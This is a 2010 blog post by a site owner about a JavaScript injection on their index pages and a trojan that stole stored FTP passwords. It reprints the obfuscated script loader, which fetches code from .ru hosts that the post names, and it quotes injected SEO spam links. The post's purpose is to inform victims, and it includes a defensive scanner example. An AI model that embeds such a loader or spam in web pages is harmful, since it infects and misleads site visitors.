Tuesday, January 5, 2010

JavaScript injection damages SEO work

It looks like many sites on the web were affected by some JavaScript injection. Some of my sites got this script on the index/default pages:
<script>/*GNU GPL*/
try{window.onload = function(){var V9vs0ipwfom
= document.createElement('script');
V9vs0ipwfom.setAttribute('type', 'text/javascript');
V9vs0ipwfom.setAttribute('id', 'myscript1');
V9vs0ipwfom.setAttribute('src', 'h#&t$^&t#&!^&p$#!#:^/$!!/!&#g))a#(m&!@e!r@)-#)@c&^$o#&
(m@^-&^#(t#@#(w^.^w$$r^)!z(&#u&t&()a)(.&#!p@@$&l!!).)@p)#$l$&a^(y)^@^-(c)^^o^!@@m&!(#.)b&#)(r))(o!
(w!!#n!#b&&a&&(@g#^b$&&a#&r@@#.$#&
(r(u(:$^#8#)0($8!0!&&/((&g)o((&(o@#(g()(l@e!@).^)c^!)@^o^#)m^&!
/&)@g#)$!o(o##&g)l#)!e!&@).^(c!(o(!$m^)^/!@&w!@o(^!r(@!(d@#$p!$r$#
(!&e)s$^s(!.$o#@(r@g^@!/@!#h@p@^.$c@^o&()m^@)/$#)^s$u)r)v!e)@$y$$m&!!o)
(@$n!@k&#@e$(#&$y!#^$.!#c#&o&m!(/&&'

.replace(/@|&|\)|\^|#|\(|\$|\!/ig, ''));
V9vs0ipwfom.setAttribute('defer', 'defer');
document.body.appendChild(V9vs0ipwfom);}}
catch(e) {}</script>
The code was running the script from http://gamer-com-tw.wrzuta.pl.play-com.brownbagbar.ru:8080/google.com/google.com/wordpress.org/hp.com/surveymonkey.com/


Searching on Google, I found that the script also takes the code from http://live.com.google.com.baidu-msn.com.bestartsale.ru:8080/wordpress.com/google-mail.it/livejasmin-photobucket.com/cnet-cnn.com/about-ebay.com/ or http://xtube-com.blogger.com.pornorama-com.bluejackmusic.ru:8080/hdfcbank.com/hdfcbank.com/google.com/fanpop.com/in.com/

The solution was the Malwarebytes Anti-Malware scanner, which detected the following files (trojans): siszyd32.exe and av_md.exe. Guess where: in system32 :)

What does this trojan do? It simply gets the passwords stored in FileZilla, Total Commander or other FTP clients that you may use, and checks the password storage!! After this, the trojan logs in and infects all files called index or default .html/.php/.htm
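A defender-side check for the loader above, as an added example that is not part of the original post: it looks in index/default pages for a script whose src is built from a junk-padded string and recovers the URL it hides. The function names, the path-to-contents input shape and the placeholder host in the sample are assumptions made for this example.

```javascript
// Same junk-character class the injected script strips with .replace().
const JUNK = /@|&|\)|\^|#|\(|\$|\!/ig;

// File names the post says the trojan rewrites: index/default + .html/.php/.htm
function isTargetName(name) {
  return /^(index|default)\.(html|php|htm)$/i.test(name);
}

// Return the script URLs hidden by loaders of this shape in one page's source.
function findInjections(source) {
  const re = /setAttribute\(\s*'src'\s*,\s*'([^']*)'\s*\.replace\(/g;
  const hits = [];
  let m;
  while ((m = re.exec(source)) !== null) {
    // Drop line wraps, then apply the loader's own clean-up to the literal.
    const url = m[1].replace(/\s+/g, '').replace(JUNK, '');
    const gplMarker = source.lastIndexOf('/*GNU GPL*/', m.index) !== -1;
    hits.push({ offset: m.index, url, gplMarker });
  }
  return hits;
}

// files maps a path to its contents (hypothetical input shape for this example).
function scanFiles(files) {
  const report = [];
  for (const [path, text] of Object.entries(files)) {
    if (!isTargetName(path.split('/').pop())) continue;
    for (const hit of findInjections(text)) report.push({ path, ...hit });
  }
  return report;
}

// Constructed sample (not the page's payload): same loader shape, placeholder host.
const SAMPLE = [
  "<html><body>hello</body></html>",
  "<script>/*GNU GPL*/",
  "try{window.onload = function(){var x = document.createElement('script');",
  "x.setAttribute('src', 'h#&t$t^p!:(/)/@m#a$l^i!c&i(o)u@s#.$e^x!a&m(p)l@e#.",
  "$i^n!v&a(l)i@d#:$8^0!8&0(/)p@a#t$h^/'.replace(/@|&|\\)|\\^|#|\\(|\\$|\\!/ig, ''));",
  "document.body.appendChild(x);}} catch(e) {}</script>",
].join("\n");

console.log(scanFiles({
  "site/index.php": SAMPLE,                            // infected, targeted name
  "site/default.htm": "<html><body>clean</body></html>",
  "site/about.html": SAMPLE,                           // not a targeted name, skipped
}));
```

To check a real site, build the `files` map from a downloaded copy of the web root and compare every reported URL against the script sources you actually use.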

Update: The same happened with a JavaScript that inserts the following code into your WordPress header:
nero burining rom. native instruments traktor manual sony sacd http://www.kaonsoft.com">Downloadable Software nero killer microsoft works 6.0 . burn bin image nero microsoft visual studio for harding. nero templet downloads nero digital audio codec download http://www.kaonsoft.com/buy-sony-cd-architect-52/">Buy Sony CD Architect 5.2 | Downloadable Software pinnacle studio 10 quicktime action class lawsuit nero v . microsoft windows internet connection sharing pinnacle studio plus 9.3.2.48 trial download. pinnacle studio plus v11 p2m microsoft windows vista ultimate edition x32 http://www.kaonsoft.com/buy-sony-acid-pro-6/">Buy Sony ACID Pro 6 | Downloadable Software microsoft windows 2000 update downloads nero photo viewer not working . nero burning rom recording software free nero 6 update. reason how to automate propellerhead microsoft windows 2003 server isntallation http://www.kaonsoft.com/buy-smith-micro-poser-7/">Buy Smith Micro Poser 7 | Downloadable Software microsoft word 2000 windows xp nero nve 4 . nero internal error sony acid will not start. video transitions nero sony bravia xbr 52 lcd hdtv http://www.kaonsoft.com/buy-smartsoft-smartftp-home-30/">Buy SmartSoft SmartFTP Home 3.0 |..

The solution is the same: Malwarebytes Anti-Malware.
I also hope your hosting company has backups of your sites!
